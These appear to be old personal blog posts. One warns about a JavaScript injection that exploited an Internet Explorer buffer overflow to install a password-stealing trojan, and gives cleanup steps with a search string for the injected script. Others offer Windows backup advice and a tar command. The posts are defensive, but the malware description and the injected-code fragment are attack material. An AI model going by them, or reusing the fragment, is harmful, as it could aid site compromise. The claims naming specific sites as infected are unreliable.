W3Net.eu

I must warn you to not use Internet Explorer while you are reading this post.
Your computer might get infected by a computer virus otherwise! If you are paranoid you can disable JavaScript in your browser too.

If you are not using Internet Explorer (or Maxthon) you can go on reading.

It is a long line of JavaScript code that some web sites’ HTML source code contains.
It can be found at the top or bottom of the HTML source code.
I’ve created a screen shot to show you how it looks like.

Do you know what it is?

It is a malicious JavaScript code that exploits Internet Explorer’s buffer overflow vulnerability.
Microsoft Internet Explorer (IE) contains a buffer overflow vulnerability
that can be exploited to execute arbitrary code with the privileges of the user running IE.

The special JavaScript code tries to execute a binary code, a trojan virus.
Your computer gets infected immediately by a trojan virus, such as Win32/Spy.Delf.NEY,
when you visit such "infected" web site with Internet Explorer on Windows XP SP1.
Other browsers might crash or close themselves. Firefox for instance immediately terminates itself when you visit such page.

How do web sites get infected?

At first, I believed the files on the server are modified by a vulnerable CMS or blog engine. That’s not true.
It is the infected computer that injects the malicious code into all files on the root of the web server without the knowledge of the user, of course.
When your computer is infected the virus tries to steal passwords from your computer to FTP servers.
It is confirmed that the virus can easily steal all FTP passwords from Total Commander’s configuration file, as the
passwords are not encrypted (maybe encrypted but the encryption is too weak).
Many web developers, including me, use Total Commander.
Although it is not advised to store passwords, we do it because we are too lazy to type the password all the time.

What to do when your computer or web site is infected by such trojan

1. Do not panic! It cannot be worse.
2. Remove the virus from your computer (the best would be to restore the system partition from an archive).
   The second preferred option is to remove the virus with an antivirus. Make sure you disconnect your computer from the internet when you are doing it.
3. If your computer is clean, remove the stored passwords from Total Commander
4. Now you need to check all your web sites one by one if they are not infected. Do not use Internet Explorer, your computer might catch the infection again.
   
   Download all the files of your websites via FTP and search for the malicious JavaScript code. You can use Total Commander’s "Find Files" feature (ALT-F7) for this.
   You will be looking up all files that contain the special string <!--[O]--><script>document.write(unescape.
   If you found infected files, remove the JavaScript code from them. Then you can upload the modified files back to the server.
5. Now you need to change all your FTP passwords as the virus might have sent them to someone else.
6. Last but not least you should update your browser.
7. There is something else. Maybe you should notify your web site’s visitors about the infection ;)

It can be very embarrassing if your website is infected with such code. You might receive a few unfriendly e-mails from some visitors, customers.
The worst thing is that you can loose many visitor or customers. Your website can easily loose the trust and good name in a few hours or days.
The sooner you detect and resolve the infection the better. As an example, here are two links to infected web sites:
novepc.sk, webtest.sk. The first is
an online store selling computer hardware and the latter is a website collecting some of the most beautiful Slovak and Czech websites.
It is visited especially by web designers (Total Commander is very popular in Slovakia, too ;)).

Further reading

• A forum thread - someone is asking for advice

Recently one of my new SATA disks crashed and I lost some data, fortunately not crucial data. After a full day of work I had a running system again. It took me to reinstall everything a whole day. So this means I could not work for one day and this had an impact on my income too. Not mentioning the unexpected extra expenses I had (later on about it). What can I do to avoid such inconveniences in the future?

I should have had some backups of the crucial data. But is it enough to make regularly backups of your data? Well, you can do much more than that. Read on to learn my backup suggestions, rules.

It fits my needs and I hope some aspects of it might be useful to others as well.

Rule 1: do not store any data on your system partition!

This is the most important rule. Let me explain the reason. The likehood that your Windows will not start one day (think of virus infections, etc.) is much more higher than that it won’t start because of disk errors. Windows is pretty vulnerable and you do not have to do anything special to spoil your stable Windows and get an unstable and slow Windows. Many times you have to reinstall the whole Windows because you cannot fix it. And when such thing happens to you, I bet you will forget to archive some of your crucial data such as your precious bookmarks from your browsers, your emails from Outlook, your documents from My Docoments folder, your Total commander FTP account settings from Windows folder, your php.ini file from windows folder, and I could go on till the evening with the list of things that you probably should archive before reinstalling Windows. You see, it is a very bad idea to store any data on the system partition. But how can you not store any data on your system partition? I am afraid, some data you cannot store on other partitions than the system. There are two possibilities:

Regularly copy data from system partition to another partition

Those data that must be stored on system partition must be archived (naturally the archive will be created on another partition, it will not have much sense othwerwise). There is a great free tool for this task. It is SyncToy by Microsoft. This easy to use, customizable tool helps you copy, move, rename, and delete files between folders and computers. You will need to identify all data (what is important for you) on your system partition (it is probably your c: drive). SyncToy can even be scheduled so that it will create the archives automatically, let us say every evening (read the documentation to your SyncToy to learn how to schedule SyncToy).

Here is my list of things I found worth archiving (click the image):

SyncToy does not work on older Windows but never mind. You can use another great built-in tool, Backup Utility for Windows.

Quite few people know about this tool, although you can find it in every version of Windows 2000 and Windows XP (correct me if I am wrong, I did not check this information). Here is how you can start it: Start -> Programs -> Accessories -> System Tools.

Try to store as much data as possible on another partitions

I succeeded in changing the default folder location of:

• My Documents
  • How to Change the Default Location of the My Documents Folder
  
  • Outlook Express

  Rule 2: regularly archive your system partition

  Since reinstalling Windows and all the software you need takes a great deal of time (at least a whole day), you should avoid it. System partition cannot be archived just by copying all the files from disk c: into a folder on another drive. An image must be created from the whole partition, witch is an identical copy of the partition. Whenever your Windows gets spoilt or infected by some nasty virus, you just restore the entire partition from the image file. But hang on a sec. You will need to buy some extra hardware and maybe software to ease your life a bit. Do not worry, it will not cost you much.

  List of things you will need to obtain:

  First of all I recommend you to buy a mobile rack (either SATA or ATA). I chose VP-15USB2 because it was pretty cheap.

  You also need an UDMA hard drive (UDMA or SATA depending on the mobile rack you bought) which you will use only for archiving, nothing else. Its capacity should not be less than 60GB. Low capacity UDMA hard drives are sold at discont prices these days so it will not be expensive.

  You also need a drive image backup software for creating image archives of the entire system partition. I was looking for a freeware tool quite long, and I found a few but none of them fit my needs (either did not support SATA, or was too complicated without a GUI). So I looked for a cheap alternative. Luckily I found one, which does exactly what I needed nothing more or less. It is Image for Windows. After I wrote this blog post I found a freeware tool called DrvImagerXP (read this review about the tool).

  How to archive your Windows?

  Prepare your backup hard disk:

  First of all, you need to create at least 2 partitions on your backup drive. The first partition will be for Windows and the second for storing the backup image files. Next you must clone your system partition onto the first partition of your backup drive. Probably you need to first create an image archive of the system partition and then restore the system from the archive but you will choose as the target the backup drive (first partition). You also need to activate this partition to be able to boot from it (Image for Windows can do it for you).

  Creating image archives regularly:

  I only attach the backup hard drive with the use of the mobile rack (do not forget to shut down your computer before attaching the drive, not all mobile racks supports hot swap) when I need to use it either because I want to create a new archive of the system partition or restore it completely from an earlier archive. It is quite important that you keep your backup hard drive in a safe place and use it only when needed for archiving.

  I use Image for Windows and create a drive image backup every weekend. The software can be run directly from Windows. The archive image file is stored on the backup disk. I keep older archive files too as I have enough space on the disk. It takes the software to create the archive image only a few minutes. I was quite impressed how quicly the image file was created. And its size is only about 2GB.

  How you restore your Windows?

  You simple attach your backup drive to the computer and boot from that disk. You might need to change the boot sequence in your BIOS settings. I do not have to change the boot sequence in BIOS settings. The computer boots up from the backup drive automatically. So when your clone Windows booted up and you logged in, you can restore the system partition from the latest image file. Then you switch off your computer, remove the archive drive, switch it on again, and everything works again.You are able to restore your Windows without any data loss in about 20 minutes!

  Recently my computer was infected by a trojan virus which caused Windows run very slow. I took my backup drive, started windows from it, and restored the system from the latest archive. It did not take me more than 20 minutes and I could continue with my work where I interrupted!

  Rule 3 - Backup, backup, backup all crucial data

  Critical data should be backed up on a regular basis.

  You should consider using RAID 1

  If you use your computer for doing some business you are highly recommended to set up RAID 1 array. It will cost you the price of a new hard disk identical with the one you already have.

  Some useful tools

  • SeaTools Desktop

If you have shell access to your web site you might find this command useful. I use it to archive my web site. It comes handy especially if you have hundreds of files on the server, so downloading them via FTP would take very long.

You log in to your shell account with an SSH client (I use PuTTY). Then you navigate to the folder whose content you wish to archive. The following will create a Tar archive file of the entire folder including sub folders.
tar -czvf archive_name *